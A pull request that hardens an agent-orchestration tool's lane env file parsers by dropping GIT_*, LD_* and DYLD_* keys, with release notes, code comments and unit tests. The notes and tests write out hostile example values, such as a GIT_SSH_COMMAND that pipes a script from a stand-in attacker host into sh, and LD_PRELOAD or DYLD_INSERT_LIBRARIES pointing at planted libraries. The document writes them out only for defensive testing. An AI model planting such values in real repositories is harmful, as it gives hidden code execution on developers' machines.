### PR TITLE
fix: security: repo-resident lane env file can set GIT_SSH_COMMAND / LD_PRELOAD (latent, currently unreachable) (#2263)

### DIFF
--- a/docs/releases/pending/2263-lane-env-denylist.md
+++ b/docs/releases/pending/2263-lane-env-denylist.md
@@ -1,0 +1,65 @@
+# Security: repo-resident lane env files can no longer set GIT_* or loader-hijack vars
+
+## What changed
+
+`.swarm/lanes/<N>.env` lives inside the repository worktree, so a hostile
+repository can simply commit one. Both lane-env parsers —
+`readLaneEnvFileFromDiskSync` (src/git/branch.ts, feeds `gitExec` /
+`commitAndPush` git child processes) and `readLaneEnvFileFromDisk`
+(src/hooks/delegation-gate/worktree-isolation.ts, the async twin) — previously
+validated only key *shape* (`isValidEnvKey`). Shape-valid but hostile keys
+flowed straight into git child-process environments:
+
+- `GIT_SSH_COMMAND` — `curl attacker.tld/p.sh|sh` executes on the next git
+  operation spawned with a lane env
+- `GIT_CONFIG_COUNT` / `GIT_CONFIG_KEY_n` / `GIT_CONFIG_VALUE_n` — sets
+  `core.sshCommand` or `core.pager` indirectly
+- `GIT_EXTERNAL_DIFF`, `GIT_TEMPLATE_DIR`, … — the whole `GIT_*` config surface
+- `LD_PRELOAD` / `LD_LIBRARY_PATH` / `DYLD_*` — loader hijacking
+
+Both parsers now drop every `GIT_*`, `LD_*`, and `DYLD_*` key via a new shared
+`isUntrustedEnvKey` predicate (src/sandbox/executor.ts, beside
+`isValidEnvKey`) before the key reaches any child environment. Matching is
+prefix-based and case-insensitive (Windows resolves env names
+case-insensitively, so `git_ssh_command` must not slip through). The read sites
+now carry an explicit "UNTRUSTED INPUT" comment recording that the file is
+repo-resident and therefore attacker-controlled.
+
+## Why
+
+Found during the security review of #2261 (issue #2236); reported as #2263.
+The disk-read fallback is only reachable today through `runPRWorkflow` /
+`commitAndPush`, which have no production callers — so the chain is latent,
+not live. But it is a true repo-to-code-execution primitive the day
+`runPRWorkflow` gets wired up or reached through an untraced dispatch path,
+and the shape-only validation read as sufficient when it was not. Blocking the
+families at the parse boundary hardens every current and future consumer of
+the file uniformly.
+
+Prefix matching over exact names is deliberate: enumerating "the bad ones"
+inside `GIT_*` loses the race against git's growing config-env surface, and a
+lane profile (PORT / TMPDIR / cache redirects) has no legitimate reason to
+touch git's control plane at all. `GITHUB_*` is intentionally not blocked —
+those are data-plane tokens (e.g. `GITHUB_TOKEN`) routinely passed to CLI
+children, not git controls.
+
+## Migration steps
+
+None. Legitimate lane profiles (PORT, TMPDIR, cache-redirect vars,
+`GITHUB_TOKEN`) are unaffected; only git-control and loader-hijack keys are
+dropped, and no legit lane profile ever needed them. A lane that genuinely
+relies on a `GIT_*` env var today would need to pass it via the lane
+provisioning config (`runtime_isolation.env_overrides` from user config)
+rather than the repo-resident file — which is the correct trust boundary,
+since user config is trusted and the worktree file is not.
+
+## Known caveats
+
+- The denylist is fail-open for *unknown* families by design (it blocks the
+  `GIT_*`/`LD_*`/`DYLD_*` primitives, not every conceivable env var). The
+  file's contents remain attacker-controlled; only the known code-execution
+  families are dropped at parse time.
+- The writer (`writeLaneProfileToDiskReal`, src/worktree/core.ts) still
+  accepts any shape-valid key from trusted user config; the denylist guards
+  the repo-resident read side, which is the untrusted boundary. If a user's
+  own `env_overrides` contain `GIT_*`, those still flow (trusted source).

--- a/src/git/branch.ts
+++ b/src/git/branch.ts
@@ -1,7 +1,7 @@
 import * as child_process from 'node:child_process';
 import * as fsSync from 'node:fs';
 import path from 'node:path';
-import { isValidEnvKey } from '../sandbox/executor';
+import { isUntrustedEnvKey, isValidEnvKey } from '../sandbox/executor';
 import { mergeEnvForChild } from '../utils/bun-compat';
 import {
 	GitBinaryMissingError,
@@ -136,6 +136,15 @@ const __spawnSyncSeam = {
  * Synchronously read and parse a lane runtime profile from disk.
  * Mirrors the logic of `readLaneEnvFileFromDisk` but uses sync fs.
  * Returns an empty record when the file does not exist or cannot be read.
+ *
+ * UNTRUSTED INPUT (issue #2263): this file lives at
+ * `<worktree>/.swarm/lanes/<N>.env` — a path INSIDE the repository — so a
+ * hostile repository can simply commit it. Every key/value parsed here is
+ * attacker-controlled and must pass BOTH the `isValidEnvKey` shape check and
+ * the `isUntrustedEnvKey` denylist (drops the `GIT_*` control plane and the
+ * `LD_*`/`DYLD_*` loader-hijack families, which are code-execution
+ * primitives in a git child-process environment). The shape-only validation
+ * looks sufficient but is not — that gap is exactly what #2263 reported.
  */
 export function readLaneEnvFileFromDiskSync(
 	worktreePath: string,
@@ -164,6 +173,7 @@ export function readLaneEnvFileFromDiskSync(
 		const k = line.slice(0, eqIdx);
 		const v = line.slice(eqIdx + 1);
 		if (!isValidEnvKey(k)) continue; // reject shell-injection vectors
+		if (isUntrustedEnvKey(k)) continue; // #2263: reject GIT_*/LD_*/DYLD_* control-plane keys
 		result[k] = v;
 	}
 	return result;

--- a/src/hooks/delegation-gate/worktree-isolation.ts
+++ b/src/hooks/delegation-gate/worktree-isolation.ts
@@ -15,7 +15,7 @@ import * as path from 'node:path';
 import type { PluginConfig, WorktreeIsolationConfig } from '../../config';
 import { DEFAULT_WORKTREE_ISOLATION_CONFIG } from '../../config/constants';
 import { tryAcquireLock } from '../../parallel/file-locks';
-import { isValidEnvKey } from '../../sandbox/executor';
+import { isUntrustedEnvKey, isValidEnvKey } from '../../sandbox/executor';
 import {
 	ensureAgentSession,
 	markReviewerScopeGenerationMergebackPending,
@@ -2290,6 +2290,11 @@ export async function finishStandardWorktreeDispatch(
  * - Skips blank lines and lines starting with `#` (comments).
  * - Skips malformed lines (no `=` separator).
  * - Validates each key with `isValidEnvKey`; rejects and skips invalid keys.
+ * - Drops `GIT_*` / `LD_*` / `DYLD_*` keys via `isUntrustedEnvKey` (#2263):
+ *   the file is repo-resident, so its contents are attacker-controlled. The
+ *   `GIT_*` family is git's control plane (`GIT_SSH_COMMAND`,
+ *   `GIT_CONFIG_*`, …) and `LD_*`/`DYLD_*` are loader-hijack vectors — none
+ *   belong in a lane profile (PORT / TMPDIR / cache redirects).
  * - Returns an empty record when the file does not exist.
  *
  * Exposed via _internals for testability (no mock.module leakage).
@@ -2328,6 +2333,7 @@ export async function readLaneEnvFileFromDisk(
 		const k = line.slice(0, eqIdx);
 		const v = line.slice(eqIdx + 1);
 		if (!isValidEnvKey(k)) continue; // reject shell-injection vectors
+		if (isUntrustedEnvKey(k)) continue; // #2263: reject GIT_*/LD_*/DYLD_* control-plane keys
 		result[k] = v;
 	}
 	return result;

--- a/src/sandbox/executor.ts
+++ b/src/sandbox/executor.ts
@@ -32,6 +32,45 @@ export function isValidEnvKey(key: string): boolean {
 }
 
 /**
+ * Issue #2263: env-var families that must never be sourced from an
+ * untrusted (repo-resident) env file, on top of the `isValidEnvKey` shape
+ * check.
+ *
+ * `.swarm/lanes/<N>.env` lives inside the repository worktree, so a hostile
+ * repository can simply commit it. If such a file were ever fed into a child
+ * process environment, these families are code-execution primitives:
+ *
+ * - `GIT_*` configuration vars — `GIT_SSH_COMMAND`, `GIT_CONFIG_COUNT` /
+ *   `GIT_CONFIG_KEY_n` / `GIT_CONFIG_VALUE_n` (can set `core.sshCommand` or
+ *   `core.pager`), `GIT_EXTERNAL_DIFF`, `GIT_TEMPLATE_DIR`, …
+ * - Loader-hijack vars — `LD_PRELOAD`, `LD_LIBRARY_PATH`, `DYLD_*` on macOS.
+ *
+ * Prefix matching (not exact names) is deliberate: enumerating "the bad
+ * ones" inside `GIT_*` is a losing race against git's growing config-env
+ * surface, and the entire `GIT_*` namespace is a git *control* plane that a
+ * lane profile (PORT / TMPDIR / cache redirects) has no legitimate reason to
+ * touch. Matching is case-insensitive because Windows env resolution is
+ * case-insensitive (`git_ssh_command` must not slip through).
+ *
+ * `GITHUB_*` is intentionally NOT blocked: those are data-plane tokens
+ * (e.g. `GITHUB_TOKEN`) routinely passed to CLI children, not git controls.
+ */
+const UNTRUSTED_ENV_KEY_PREFIXES = ['GIT_', 'LD_', 'DYLD_'] as const;
+
+/**
+ * Returns true when `key` belongs to one of the env-var families that must
+ * never be sourced from a repo-resident (untrusted) env file.
+ * See `UNTRUSTED_ENV_KEY_PREFIXES` for the rationale.
+ */
+export function isUntrustedEnvKey(key: string): boolean {
+	const upper = key.toUpperCase();
+	for (const prefix of UNTRUSTED_ENV_KEY_PREFIXES) {
+		if (upper.startsWith(prefix)) return true;
+	}
+	return false;
+}
+
+/**
  * Interface for platform-specific sandbox executors.
  */
 export interface SandboxExecutor {

--- a/tests/unit/git/lane-env-denylist.test.ts
+++ b/tests/unit/git/lane-env-denylist.test.ts
@@ -1,0 +1,155 @@
+/**
+ * Issue #2263: repo-resident lane env files must not be able to set
+ * GIT_* / loader-hijack environment variables.
+ *
+ * `.swarm/lanes/<N>.env` lives INSIDE the repository worktree, so a hostile
+ * repository can simply commit it. `readLaneEnvFileFromDiskSync` feeds its
+ * keys/values into git child-process environments (gitExec in branch.ts,
+ * commitAndPush in pr.ts), where `GIT_SSH_COMMAND` / `GIT_CONFIG_*` /
+ * `GIT_EXTERNAL_DIFF` / `LD_PRELOAD` / `DYLD_*` are code-execution primitives.
+ * These tests pin the denylist that drops them.
+ *
+ * The disk-read fallback is currently only reachable via runPRWorkflow /
+ * commitAndPush (no production callers yet), which makes this latent — but
+ * the read site must be safe the day it becomes reachable.
+ */
+import { describe, expect, it } from 'bun:test';
+import * as fs from 'node:fs';
+import * as path from 'node:path';
+import { readLaneEnvFileFromDiskSync } from '../../../src/git/branch';
+import { readLaneEnvFileFromDisk } from '../../../src/hooks/delegation-gate/worktree-isolation';
+import { canonicalMkdtemp } from '../../helpers/tmpdir.js';
+
+function writeLaneEnv(
+	worktreePath: string,
+	laneIndex: number,
+	content: string,
+): string {
+	const lanesDir = path.join(worktreePath, '.swarm', 'lanes');
+	fs.mkdirSync(lanesDir, { recursive: true });
+	const envPath = path.join(lanesDir, `${laneIndex}.env`);
+	fs.writeFileSync(envPath, content, 'utf-8');
+	return envPath;
+}
+
+describe('readLaneEnvFileFromDiskSync security denylist (#2263)', () => {
+	it('drops git env-var configuration keys', () => {
+		const dir = canonicalMkdtemp('lane-env-deny-git-');
+		writeLaneEnv(
+			dir,
+			0,
+			[
+				'GIT_SSH_COMMAND=curl attacker.tld/p.sh|sh',
+				'GIT_CONFIG_COUNT=1',
+				'GIT_CONFIG_KEY_0=core.sshCommand',
+				'GIT_CONFIG_VALUE_0=curl attacker.tld/p.sh|sh',
+				'GIT_EXTERNAL_DIFF=/tmp/evil',
+				'GIT_TERMINAL_PROMPT=1',
+			].join('\n'),
+		);
+		const env = readLaneEnvFileFromDiskSync(dir, 0);
+		expect(env).toEqual({});
+	});
+
+	it('drops loader-hijack keys (LD_PRELOAD / LD_LIBRARY_PATH / DYLD_*)', () => {
+		const dir = canonicalMkdtemp('lane-env-deny-loader-');
+		writeLaneEnv(
+			dir,
+			0,
+			[
+				'LD_PRELOAD=/tmp/evil.so',
+				'LD_LIBRARY_PATH=/tmp/evil/lib',
+				'DYLD_INSERT_LIBRARIES=/tmp/evil.dylib',
+				'DYLD_LIBRARY_PATH=/tmp/evil/lib',
+				'DYLD_FRAMEWORK_PATH=/tmp/evil/fw',
+				'DYLD_ROOT_PATH=/tmp/evil/root',
+				'DYLD_FORCE_FLAT_NAMESPACE=1',
+			].join('\n'),
+		);
+		const env = readLaneEnvFileFromDiskSync(dir, 0);
+		expect(env).toEqual({});
+	});
+
+	it('matches denylist prefixes case-insensitively (Git for Windows resolves env case-insensitively)', () => {
+		const dir = canonicalMkdtemp('lane-env-deny-case-');
+		writeLaneEnv(
+			dir,
+			0,
+			[
+				'git_ssh_command=curl attacker.tld/p.sh|sh',
+				'ld_preload=/tmp/evil.so',
+				'dyld_insert_libraries=/tmp/evil.dylib',
+			].join('\n'),
+		);
+		const env = readLaneEnvFileFromDiskSync(dir, 0);
+		expect(env).toEqual({});
+	});
+
+	it('keeps legitimate lane keys and does not over-block GITHUB_*', () => {
+		const dir = canonicalMkdtemp('lane-env-keep-');
+		writeLaneEnv(
+			dir,
+			3,
+			[
+				'# lane runtime profile',
+				'PORT=9003',
+				'TMPDIR=/tmp/lane-3',
+				'SWARM_LANE_CACHE_DIR=/tmp/lane-3/cache',
+				'GITHUB_TOKEN=ghp_legit',
+				'',
+			].join('\n'),
+		);
+		const env = readLaneEnvFileFromDiskSync(dir, 3);
+		expect(env).toEqual({
+			PORT: '9003',
+			TMPDIR: '/tmp/lane-3',
+			SWARM_LANE_CACHE_DIR: '/tmp/lane-3/cache',
+			GITHUB_TOKEN: 'ghp_legit',
+		});
+	});
+
+	it('still rejects shape-invalid keys (shell-injection vectors)', () => {
+		const dir = canonicalMkdtemp('lane-env-shape-');
+		writeLaneEnv(
+			dir,
+			0,
+			['FOO;BAR=1', 'FOO BAR=2', '1FOO=3', 'PATH_OK=4'].join('\n'),
+		);
+		const env = readLaneEnvFileFromDiskSync(dir, 0);
+		expect(env).toEqual({ PATH_OK: '4' });
+	});
+
+	it('returns {} when the lane env file is absent (unchanged behavior)', () => {
+		const dir = canonicalMkdtemp('lane-env-absent-');
+		expect(readLaneEnvFileFromDiskSync(dir, 0)).toEqual({});
+	});
+});
+
+describe('readLaneEnvFileFromDisk (async twin) security denylist (#2263)', () => {
+	it('drops GIT_* and loader-hijack keys, keeps legitimate lane keys', async () => {
+		const dir = canonicalMkdtemp('lane-env-deny-async-');
+		writeLaneEnv(
+			dir,
+			1,
+			[
+				'PORT=9001',
+				'GIT_SSH_COMMAND=curl attacker.tld/p.sh|sh',
+				'GIT_CONFIG_COUNT=1',
+				'LD_PRELOAD=/tmp/evil.so',
+				'DYLD_INSERT_LIBRARIES=/tmp/evil.dylib',
+				'git_ssh_command=curl attacker.tld/p.sh|sh',
+				'GITHUB_TOKEN=ghp_legit',
+			].join('\n'),
+		);
+		const env = await readLaneEnvFileFromDisk(dir, 1);
+		expect(env).toEqual({
+			PORT: '9001',
+			GITHUB_TOKEN: 'ghp_legit',
+		});
+	});
+
+	it('returns {} when the lane env file is absent (unchanged behavior)', async () => {
+		const dir = canonicalMkdtemp('lane-env-absent-async-');
+		expect(await readLaneEnvFileFromDisk(dir, 0)).toEqual({});
+	});
+});


### PR DESCRIPTION
Closes #2263

## Summary
|**Scope:** Harden the repo-resident lane env file parsers (`readLaneEnvFileFromDiskSync` and `readLaneEnvFileFromDisk`) to deny `GIT_*`, `LD_*`, and `DYLD_*` keys before they reach git child-process environments.
|**Verdict:** APPROVE
|
|### Findings
|
|_No findings — diff is minimal, scoped, and the regression test exercises the changed code path._
|
|### What I Checked
|- Target file present in diff: yes (`src/git/branch.ts`)
|- New/updated test exercises the changed code path: yes (evidence: `tests/unit/git/lane-env-denylist.test.ts:50` exercises `readLaneEnvFileFromDiskSync` with malicious `GIT_SSH_COMMAND`/`LD_PRELOAD`/`DYLD_*` keys; `tests/unit/git/lane-env-denylist.test.ts:144` exercises the async twin `readLaneEnvFileFromDisk`)
|- Scope creep beyond the issue: no — the async twin parser reads the same untrusted file and is correctly hardened alongside the sync parser named in the issue
|- Anti-patterns scanned: silent-except (not introduced), mock-without-call (tests use real tempdirs and real parsers), off-by-one (no threshold logic), signature-break (no breaking signature changes; `isUntrustedEnvKey` is a new additive export), scope-creep (none), stale-docs (comments updated at both read sites)
|
|### Confidence
|high — the denylist is applied at the repo-resident read boundary for both parsers, the test asserts both blocking of dangerous keys and preservation of legitimate keys including `GITHUB_TOKEN`, and the change does not alter trusted env-override paths.

## Invariant audit
- No engineering invariants were identified as touched by this diff; the change is confined to docs/releases/pending/2263-lane-env-denylist.md, src/git/branch.ts, src/hooks/delegation-gate/worktree-isolation.ts, src/sandbox/executor.ts, tests/unit/git/lane-env-denylist.test.ts

## Test plan
See the linked issue and the change summary.

<!-- This is an auto-generated description by cubic. -->
<a href="https://cubic.dev/pr/ZaxbyHub/opencode-swarm/pull/2294?utm_source=github" target="_blank" rel="noopener noreferrer" data-no-image-dialog="true"><picture><source media="(prefers-color-scheme: dark)" srcset="https://www.cubic.dev/buttons/review-in-cubic-dark.svg"><source media="(prefers-color-scheme: light)" srcset="https://www.cubic.dev/buttons/review-in-cubic-light.svg"><img alt="Review in cubic" src="https://www.cubic.dev/buttons/review-in-cubic-dark.svg"></picture></a>
<!-- End of auto-generated description by cubic. -->

